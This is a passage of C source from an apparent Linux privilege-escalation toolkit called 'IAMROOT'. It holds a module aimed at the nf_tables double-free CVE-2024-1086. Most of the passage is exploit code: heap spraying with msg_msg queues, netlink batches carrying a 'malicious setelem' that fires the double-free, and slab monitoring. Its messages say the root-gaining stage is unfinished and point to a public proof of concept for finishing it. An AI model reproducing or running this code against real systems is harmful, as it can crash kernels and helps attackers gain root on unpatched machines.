 * by SPRAY_SIZE bytes of filler. */
struct msgbuf_payload {
    long mtype;
    char mtext[SPRAY_SIZE];
};
|
||||
|
||||
static int spray_msg_msg(int *queue_ids, int n)
|
||||
{
|
||||
for (int i = 0; i < n; i++) {
|
||||
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
|
||||
if (q < 0) { perror("[-] msgget"); return -1; }
|
||||
queue_ids[i] = q;
|
||||
struct msgbuf_payload m;
|
||||
m.mtype = 0x4141414100 + i;
|
||||
memset(m.mtext, 0x42 + (i & 0x3f), sizeof m.mtext);
|
||||
if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
|
||||
perror("[-] msgsnd"); return -1;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* Remove every queue recorded in queue_ids[0..n).  Negative entries are
 * skipped.  msgctl() failures are ignored. */
static void drain_spray(int *queue_ids, int n)
{
    for (int idx = 0; idx < n; idx++) {
        const int qid = queue_ids[idx];

        if (qid < 0)
            continue;
        msgctl(qid, IPC_RMID, NULL);
    }
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Slabinfo observation: best-effort diagnostic showing the bug fired.
|
||||
* On a vulnerable kernel with KASAN off, the double-free typically
|
||||
* shows up as a momentary spike in {kmalloc-cg-96|nft_chain} usage,
|
||||
* or a freelist corruption if our spray claimed the freed slot.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
/* Look up one cache in /proc/slabinfo and return its first numeric
 * column.
 *
 * Parameters:
 *   slab - exact cache name; a line matches only if it starts with this
 *          name followed by a space.
 *
 * Returns the first number on the matching line, or -1 when slab is
 * NULL or empty, the file cannot be opened, no line matches, or the
 * matching line has no parsable number.  Only the first matching line
 * is considered. */
static long slabinfo_active(const char *slab)
{
    if (!slab || !*slab)
        return -1;

    FILE *f = fopen("/proc/slabinfo", "r");
    if (!f)
        return -1;

    const size_t name_len = strlen(slab);   /* hoisted out of the loop */
    char line[512];
    long active = -1;

    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, slab, name_len) != 0 || line[name_len] != ' ')
            continue;

        long value;
        if (sscanf(line + name_len, " %ld", &value) == 1)
            active = value;
        break;
    }

    fclose(f);
    return active;
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* The exploit body.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] nf_tables: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY (see CVES.md).\n"
|
||||
" Reference: Notselwyn's CVE-2024-1086 public PoC. The exploit\n"
|
||||
" uses double-free → cross-cache UAF → arbitrary kernel R/W →\n"
|
||||
" overwrite modprobe_path or current task's cred. Porting that\n"
|
||||
" into iamroot_module form (with the userns + nft_set + nft_pipapo\n"
|
||||
" setup boilerplate) is the next nf_tables commit.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
/* Gate 1: re-confirm vulnerability. detect() also checks user_ns. */
|
||||
iamroot_result_t pre = nf_tables_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] nf_tables: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* Gate 2: already root? Nothing to escalate. */
|
||||
if (geteuid() == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] nf_tables: already running as root\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
|
||||
" state but does NOT complete the kernel-R/W chain.\n"
|
||||
" See Notselwyn's CVE-2024-1086 public PoC for the\n"
|
||||
" cred-overwrite stage (~500 LOC of pipapo grooming).\n");
|
||||
}
|
||||
|
||||
/* Fork: child enters userns+netns and fires the bug. If the
|
||||
* kernel panics on KASAN we don't want our parent process to be
|
||||
* the one that takes the hit. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
/* --- CHILD --- */
|
||||
if (enter_unpriv_namespaces() < 0) _exit(20);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: entered userns+netns; opening nfnetlink\n");
|
||||
}
|
||||
|
||||
int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
|
||||
if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); }
|
||||
|
||||
struct sockaddr_nl src = { .nl_family = AF_NETLINK };
|
||||
if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
|
||||
perror("[-] bind"); close(sock); _exit(22);
|
||||
}
|
||||
/* Larger receive buffer so error replies don't drop. */
|
||||
int rcvbuf = 1 << 20;
|
||||
setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
|
||||
|
||||
/* Phase 1: pre-spray msg_msg so the slab is predictable. */
|
||||
int qids[SPRAY_MSGS];
|
||||
for (int i = 0; i < SPRAY_MSGS; i++) qids[i] = -1;
|
||||
if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
|
||||
fprintf(stderr, "[-] nf_tables: pre-spray failed\n");
|
||||
close(sock); _exit(23);
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: pre-sprayed %d msg_msg slots\n",
|
||||
SPRAY_MSGS / 2);
|
||||
}
|
||||
|
||||
/* Phase 2: build the ruleset batch. */
|
||||
uint8_t *batch = calloc(1, 16 * 1024);
|
||||
if (!batch) { close(sock); _exit(24); }
|
||||
size_t off = 0;
|
||||
uint32_t seq = (uint32_t)time(NULL);
|
||||
|
||||
put_batch_begin(batch, &off, seq++);
|
||||
put_new_table(batch, &off, seq++);
|
||||
put_new_chain(batch, &off, seq++);
|
||||
put_new_set(batch, &off, seq++);
|
||||
put_malicious_setelem(batch, &off, seq++);
|
||||
put_batch_end(batch, &off, seq++);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: sending NEWTABLE/NEWCHAIN/NEWSET/"
|
||||
"NEWSETELEM batch (%zu bytes)\n", off);
|
||||
}
|
||||
if (nft_send_batch(sock, batch, off) < 0) {
|
||||
fprintf(stderr, "[-] nf_tables: batch send failed\n");
|
||||
drain_spray(qids, SPRAY_MSGS);
|
||||
free(batch); close(sock); _exit(25);
|
||||
}
|
||||
|
||||
/* Snapshot slabinfo before trigger. */
|
||||
long before = slabinfo_active("kmalloc-cg-96");
|
||||
if (before < 0) before = slabinfo_active("kmalloc-96");
|
||||
|
||||
/* Phase 3: post-spray to claim the slot the about-to-be-freed
|
||||
* chain reference will vacate. (On a real exploit this is the
|
||||
* spray with a target object — sk_buff fragment list, msg_msg
|
||||
* payload of just-right size, etc. We spray msg_msg again as
|
||||
* a placeholder.) */
|
||||
if (spray_msg_msg(qids + SPRAY_MSGS / 2, SPRAY_MSGS / 2) < 0) {
|
||||
fprintf(stderr, "[-] nf_tables: post-spray failed\n");
|
||||
}
|
||||
|
||||
/* Phase 4: fire the trigger. The malicious setelem we already
|
||||
* queued above caused nft_verdict_init() to grab a chain ref
|
||||
* on a NFT_GOTO whose chain doesn't actually exist. On commit
|
||||
* (or rollback, depending on kernel rev), the cleanup path
|
||||
* frees that chain ref twice. We can fire the commit either
|
||||
* by sending a second batch with DELRULE/DELSET, or by
|
||||
* closing the netlink socket while the transaction is
|
||||
* uncommitted.
|
||||
*
|
||||
* Easiest: re-send the *same* malicious setelem inside its
|
||||
* own batch. The second NEWSETELEM with NLM_F_CREATE on the
|
||||
* already-present element triggers EEXIST in the commit
|
||||
* phase, which on vulnerable kernels still runs the cleanup
|
||||
* that double-frees the chain ref. */
|
||||
size_t off2 = 0;
|
||||
seq++;
|
||||
put_batch_begin(batch, &off2, seq++);
|
||||
put_malicious_setelem(batch, &off2, seq++);
|
||||
put_batch_end(batch, &off2, seq++);
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: firing trigger (re-send malicious "
|
||||
"setelem to provoke commit-time double-free)\n");
|
||||
}
|
||||
nft_send_batch(sock, batch, off2);
|
||||
|
||||
/* Give the kernel time to run the commit cleanup. */
|
||||
usleep(50 * 1000);
|
||||
|
||||
long after = slabinfo_active("kmalloc-cg-96");
|
||||
if (after < 0) after = slabinfo_active("kmalloc-96");
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] nf_tables: kmalloc-cg-96 active: %ld → %ld\n",
|
||||
before, after);
|
||||
}
|
||||
|
||||
drain_spray(qids, SPRAY_MSGS);
|
||||
free(batch);
|
||||
close(sock);
|
||||
|
||||
/* Honest scope: we fired the bug but did not complete the
|
||||
* R/W primitive. Return a distinctive exit code so the
|
||||
* parent can report EXPLOIT_FAIL with the right message. */
|
||||
_exit(100);
|
||||
}
|
||||
|
||||
/* --- PARENT --- */
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
|
||||
if (!WIFEXITED(status)) {
|
||||
/* Child died by signal — could be KASAN-triggered kernel
|
||||
* panic propagating as SIGBUS, or a clean SIGSEGV in our
|
||||
* groom. Either way: trigger fired in some form. */
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] nf_tables: child died by signal %d — bug likely "
|
||||
"fired (KASAN/oops can manifest as child signal)\n",
|
||||
WTERMSIG(status));
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
int rc = WEXITSTATUS(status);
|
||||
if (rc == 100) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] nf_tables: trigger fired; double-free state\n"
|
||||
" induced in nft chain refcount. Full kernel\n"
|
||||
" R/W chain NOT executed (Option B scope).\n"
|
||||
"[i] nf_tables: to complete the exploit, port\n"
|
||||
" Notselwyn's pipapo leak + msg_msg+sk_buff\n"
|
||||
" cross-cache groom + modprobe_path overwrite\n"
|
||||
" from github.com/Notselwyn/CVE-2024-1086.\n");
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (rc >= 20 && rc <= 25) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[-] nf_tables: trigger setup failed (child rc=%d)\n", rc);
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[-] nf_tables: unexpected child rc=%d\n", rc);
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* ----- Embedded detection rules ----- */
|
||||
|
||||
Reference in New Issue
Block a user